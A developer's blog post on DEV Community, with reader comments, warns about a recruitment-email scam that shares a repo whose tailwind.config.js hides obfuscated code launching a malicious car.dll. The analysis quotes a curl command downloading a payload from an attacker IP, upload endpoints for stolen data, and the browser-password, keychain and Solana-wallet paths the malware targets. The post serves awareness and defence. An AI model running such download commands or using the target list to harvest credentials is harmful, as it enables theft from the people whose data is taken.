DEV Community

Andrei Telteu

Beware recruitment emails with malware-infected git repos! admin@autosquare.store scam

New update. Read at the bottom ⏬

I received this email from the sender admin@autosquare.store:

first email

Figma design link: https://www.figma.com/design/3p7jJDw9itkYYCTi0IqAJh/AutoSquare.Store?node-id=452-7274&t=R1qT9n8hKbqg98sN-1 (looks very legit)

I replied that I was interested and asked for a job description. He replied with:

second email

Red flag! Companies usually keep their source code private, and a candidate gets access to it only after video meetings and an agreement on the work required.
Some companies also require an NDA to be signed before giving access to their source code.

The bitbucket link is: https://autosquare-admin@bitbucket.org/autosquareshop/autopart.git

A binary file called "car.dll" caught my eye. Red flag! Never trust files that end in .exe, .dll, .bat or .ps1!

project structure

The VirusTotal scan for this binary file is: https://www.virustotal.com/gui/file/1fd921159de8ccf3c33c7ad3d52a4186c2695b858435e8e327c4d95a8d1b048a/detection
It shows 4 detections as malware, along with external network calls to these endpoints:

GET http://www.royalsevres.com/javascript/activex_patch.hwp 200
POST http://103.35.190.170/Proxy.php 200
POST https://45.8.146.93:443/proxy/Proxy.php 200

I highlighted the tailwind.config.js file because I found two more red flags in it:

  • obfuscated code: no real project needs obfuscated code in this config file.
  • plain (non-obfuscated) code that launches the car.dll malware

I just want to raise awareness of this new type of scam.

UPDATE

I forgot to mention that the car.dll malware (like any .dll) only runs on Windows!
If you use Mac or Linux you should be safe from car.dll.

However, you are not safe from the obfuscated JS code. I tried to decode it using https://obf-io.deobfuscate.io/ but I don't understand exactly what it's doing.

It imports the following modules: fs (using readdirSync, statSync, createReadStream, copyFile, writeFileSync), os (using hostname, platform, homedir, tmpdir, type), path, request, and child_process (exec).

I also found these strings: .ldb, .log, Local/BraveSoftware/Brave-Browser, Local/Google/Chrome, Roaming/Opera Software/Opera Stable, Local/Microsoft/Edge, /Library/Application Support/, Firefox, solana_id.txt, /.config/solana/id.json, /AppData/, /User Data, Login Data, /Library/Keychains/login.keychain, /.local/share/keyrings/, /.mozilla/firefox/, \\.pyp\\python.exe

If I had to guess, it scans your Edge, Chrome, Firefox and Opera browser profiles, on both Windows and Mac, for the local database files where your passwords are stored, and searches for something related to the Solana blockchain. Maybe it searches for your private key file.

It also uses curl to download a zip file:
curl -Lo "tempdir\\p.zi" "http://45.83.140.231/pdown"
The IP is located in Cyprus: https://iplocation.com/?ip=45.83.140.231
I downloaded and extracted the file out of curiosity; it contains the Python binary and some libraries.

contents of zip

I also found:
POST http://45.83.140.231/uploads - where the script uploads the information stolen from your browser
GET http://45.83.140.231/client/xyz2 - another obfuscated script, this time in Python

TL;DR

I believe that the obfuscated JS snippet hidden in tailwind.config.js tries to steal information from your browser, such as session cookies, saved passwords and your Solana wallet, and uploads it to 45.83.140.231.
I sent an abuse report to the hosting company that owns this IP.

I found other people talking about this scam:

linkedin post1

linkedin post2

linkedin post3

Top comments (19)

Ben Halpern

Scary what AI is going to do to scams

A.J.Zeller

Thank you

A.J.Zeller

holy shit, I just received it and checked

Pallavi Jain

I received the same email and clicked on the Figma link. I want to confirm if there’s any problem just because I clicked on the link, even if I didn’t interact further.

Andrei Telteu

I don't think the Figma link is compromised in any way. It's just a detail they use to make you think it's a real project.
From what I know and what I saw in the code, the malware activates only when you start the project, when you run npm run start. Until then the car.dll malware does not run, I think.
Warning! It is possible to run malware when you run npm install, but I don't think that's the case with this one.

Jeremiah Aworetan

Received this email a few hours ago, thanks for writing this.

Antonio Serrat

Thanks for taking the time to share it!
I received the same email from hr@autosquare.tech and I smell something strange about them sharing the design with me without any previous contact.

Faith

People seeing recruitment emails in their mailbox are so happy that they jump into the contents without thinking!

Atomic

I also received an email from them recently, thanks for writing this.

William Jing

Thank you for sharing this. I received the same email on 22nd Nov, 11 days ago, from admin@autosquare.shop.

timDeHof

Thank you, I just received an email similar to these.